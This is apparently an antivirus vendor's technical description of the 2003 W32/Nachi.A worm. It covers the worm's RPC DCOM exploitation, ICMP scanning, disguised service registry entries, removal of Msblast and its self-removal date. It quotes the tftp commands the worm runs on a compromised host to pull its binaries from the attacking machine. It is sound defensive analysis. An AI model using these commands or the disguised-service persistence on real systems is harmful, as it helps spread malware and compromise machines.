FRISK Software International


Summary of W32/Nachi.A
Alias:W32.Welchia.Worm, W32/Nachi.worm, WORM_MSBLAST.D
Length: 10.240 bytes
Discovered: 18 Aug 2003
Definition files: 18 Aug 2003
Risk Level: Low
Distribution:Low
Infection Method:Network distribution, scans for hosts vulnerable to the RPC DCOM buffer overrun vulnerability
 
Jump to:
Brief description
Technical description

Brief Description
The W32/Nachi.A is a worm currently spreading in the wild. It attempts to exploit hosts vulnerable to the RPC DCOM buffer overrun vulnerability. Once running, it will attempt to remove W32/Msblast.A from that system, as well as attempting to update the system with the security patch from Microsoft which addresses this vulnerability. It will remove itself from infected system automatically if the year of the system is 2004.


Technical Description
The W32/Nachi.A is a worm which distributes itself by searching for hosts vulnerable to the RPC DCOM buffer overrun vulnerability, in a similar fashion to that of the W32/Msblast worm. Its body is compressed with a modified version of the UPX executable compressor, with the size of 10.240 bytes.

After the initialization routine, the worm immediately tries to create a Mutex under the name of 'RpcPatch_Mutex'. If this Mutex already exists, indicating that another copy of the worm is already running in memory, the worm exits. If no such Mutex exists the worm continues its execution.

After the worm has retrieved the system directory on the infected system, it tries to copy a the original 'tftpd.exe' file (part of the Trivial File Transfer Protocol service found on each Windows NT 4.0, 2000 and XP system) from the '%system_directory%\dllcache', to the directory of '%system_directory%\wins' under a new name 'svchost.exe'.

The worm creates two services on the infected system. After performing a check to verify wether these services already exist by connecting to the service control manager, it creates the following service, which relies on the copy the worm just made of the 'tfpt.exe'. This service is supported by registry values similar to that listed below:

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RpcTftpd]
"Description"="Coordinates transactions that are distributed across two or more databases, message queues, file systems, or other transaction protected resource managers."
"DisplayName"="Network Connections Sharing"
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):[%system_directory%\wins\svchost.exe] (this value is represented in hexadecimal format)
"ObjectName"="LocalSystem"
"Start"=dword:0000000X
"Type"=dword:00000110

If the worm isn't executed from the '%system_directory%\wins' path, it copies itself from the original location to the following directory: '%system_directory%'\wins\ as DLLHOST.EXE. The worm creates another service intended for the original worm executable. This service is supported by registry values similar to that listed below:

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RpcPatch]
"Description"="Maintains an up-to-date list of computers on your network and supplies the list to programs that request it."
"DisplayName"="WINS Client"
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):[%system_directory%\wins\DLLHOST.EXE] (this value is represented in hexadecimal format
"ObjectName"="LocalSystem"
"Start"=dword:0000000X
"Type"=dword:00000110

The W32/Nachi.A then takes a snapshot of running processes, compares the name of those processes running in memory to that of 'msblast'. This is the name used by the A variant of W32/Msblast when running as a process. If the worm detects a process running in memory under that name, it will attempt to terminate it. The worm then carries out a routine intended to remove the W32/Msblast.A from the local harddrive, by deleting a file under the %system_directory% with the name of 'msblast.exe'. Both these routines are aimed at W32/Msblast.A variant, they won't affect other W32/Msblast variants.

After this, the W32/Nachi.A gets the local system time. If the year is 2004, it removes itself from the computer. It achieves this by calling a sub-routine which deletes its service entries (both for 'RpcPatch' and 'RpcTftpd')as well as removing the copy from the user harddrive. If the year is not 2004, the worm will start initializing strings and other data needed for its network functions.

The worm resolves the domain name of "microsoft.com" and "download.microsoft.com". It gathers the version number of the Windows system running on the infected computer and checks wether the security patch released from Microsoft which addresses the RPC DCOM buffer overrun vulnerability has already been installed. If not, the worm gathers the needed information from the local system and retrieves the update from Microsoft's website. The worm will identify the following versions of Microsoft Windows:

Microsoft Windows 2000
English version
Korean version
Chineese (Traditional) version
Chineese (Simpified) version


Microsoft Windows XP
English version
Korean version
Chineese (Traditional) version
Chineese (Simplified) version


If the patch is successfully downloaded, it will carry on installing it on the machine, by running the patch locally with the following command line:
security_patch_name.exe -n -o -z -q

The W32/Nachi.A spreads through networks. In order to resolve the surrounding machines, an infected host sends out ICMP 'Echo' packets (also referred to as 'Ping' packets). The usual method this worm uses, is to resolve the IP address of the infected system and sending out ICMP packets for each available address (1-254) in the last two octals of that IP address. At times the worm might start off with a semi-random IP address. The generated traffic might resemble the following when viewed with a packet-capture tool:

Source: Destination: Protocol: Info:
Infected system IP xxx.xxx.xxx.1 ICMP [Tpe: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP xxx.xxx.xxx.1 ICMP [Tpe: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP xxx.xxx.xxx.1 ICMP [Tpe: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP xxx.xxx.xxx.1 ICMP [Tpe: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP xxx.xxx.xxx.1 ICMP [Tpe: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]
Infected system IP xxx.xxx.xxx.1 ICMP [Tpe: 8 Echo (ping) request] [Code: 0] [Checksum] [SequenceNumber] [Data (64 bytes)]


These packets are sent out and processed by individual threads within the worms body. The amount of running threads at times, varies from around 14 threads up to around 40.

If the worm receives a reply to those ICMP packets, it responds by sending a TCP packet with the SYN-flag set destined to port 135 on that machine. If this is responded to by an ACK packet from the remote machine (indicating that the remote machine is a possible target), the attacking system carries out an attack against that host. The main attack vector, deployed by the W32/Nachi.A is the exploitation of the RPC DCOM buffer overrun vulnerability. It has a built in exploit against this vulnerability, which functions on both Microsoft Windows 2000 and Microsoft Windows XP. If the attack against the remote host is successful, it will spawn a command-shell which then contacts the attacking machine. Once the shell is open, the worm connects to it and issues the following commands:

dir wins\dllhost.exe
dir dllcache\tftpd.exe
tftp -i [ip address of the attacking system] get svchost.exe wins\SVCHOST.EXE
tftp -i [ip address of the attacking system] get dllhost.exe win\DLLHOST.EXE

The worm performs these communication on the port range from 666 to 766 on the attacking machine, which is determined by part of the network setup routine.

If those files are successfully retrieved, the DLLHOST.EXE is executed and the shell closed.

The worm contains the following string, never exposed to the end user:
"=========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice: 2004 will remove myself:)~~ sorry zhongli~~~========== wins"


Analysis / Description: Sindri Bjarnason - Virus analyst FRISK Software International
 


Stay up to date with important developments via e-mail.
Stay up to date with life cycle policies for F-PROT Antivirus for Windows.
Virus news and information directly to your desktop.
Definitions of common antivirus terminology.
For further virus information, please try our partners' websites:

Authentium

perComp Verlag
(in German)
 

agoat@klaki.net argentina@f-prot.com argentina@frisk.is argentina@complex.is argentina@f-prot.is argentina@frisk-software.com argentina@f-prot.net argentina@f-prot.co.uk brazil@f-prot.com brazil@frisk.is brazil@complex.is brazil@f-prot.is brazil@frisk-software.com brazil@f-prot.net brazil@f-prot.co.uk malta@f-prot.com malta@frisk.is malta@complex.is malta@f-prot.is malta@frisk-software.com malta@f-prot.net malta@f-prot.co.uk a.bjani@f-prot.com a.bjani@frisk.is a.bjani@complex.is a.bjani@f-prot.is a.bjani@f-prot.co.uk a.bjani@frisk-software.com a.bjani@f-prot.net z.fifl@f-prot.com z.fifl@frisk.is z.fifl@complex.is z.fifl@f-prot.is z.fifl@f-prot.co.uk z.fifl@frisk-software.com z.fifl@f-prot.net strumpuri@complex.is strumpure@complex.is strumpuru@complex.is